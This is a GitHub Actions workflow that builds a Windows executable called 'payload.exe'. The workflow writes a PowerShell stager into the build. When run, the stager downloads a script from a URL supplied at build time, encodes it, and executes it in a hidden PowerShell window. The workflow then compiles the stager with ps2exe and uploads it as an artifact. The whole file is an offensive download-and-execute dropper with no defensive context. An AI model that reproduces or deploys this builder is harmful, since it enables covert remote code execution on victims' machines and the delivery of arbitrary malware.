name: Convert PowerShell to EXE using ps2exe

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch PowerShell script'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout Code
      uses: actions/checkout@v3

    - name: Install ps2exe Module
      shell: powershell
      run: Install-Module -Name ps2exe -Force -Scope CurrentUser

    - name: Save PowerShell Script with URL Injection
      shell: powershell
      run: |
        $script = @'
        function FetchScriptContent {
            param ([string]$scriptUrl)
            try {
                return Invoke-RestMethod -Uri $scriptUrl -UseBasicParsing
            } catch {
                Write-Host "Error: Failed to fetch data from URL - $scriptUrl"
                return $null
            }
        }

        function ExecuteScript {
            param ([string]$scriptContent)
            try {
                $encodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptContent))
                Start-Process -FilePath "powershell.exe" -ArgumentList "-EncodedCommand $encodedCommand" -WindowStyle Hidden
            } catch {
                Write-Host "Error: Failed to execute PowerShell script."
            }
        }

        $PayloadURL = "{PAYLOAD_URL}"

        if ($PayloadURL) {
            $ScriptData = FetchScriptContent -scriptUrl $PayloadURL
            if ($ScriptData) {
                ExecuteScript -scriptContent $ScriptData
            } else {
                Write-Host "Error: No valid data received from the URL."
            }
        } else {
            Write-Host "Error: PAYLOAD_URL is not set."
        }
        '@

        # Replace placeholder with actual input URL
        $script = $script -replace "{PAYLOAD_URL}", "${{ github.event.inputs.payload_url }}"

        # Save to file
        $script | Out-File -FilePath "payload.ps1" -Encoding utf8

    - name: Convert PowerShell Script to EXE
      shell: powershell
      run: ps2exe -inputFile '.\payload.ps1' -outputFile '.\payload.exe'

    - name: List Directory Contents
      shell: powershell
      run: Get-ChildItem -Path .

    - name: Upload Executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe





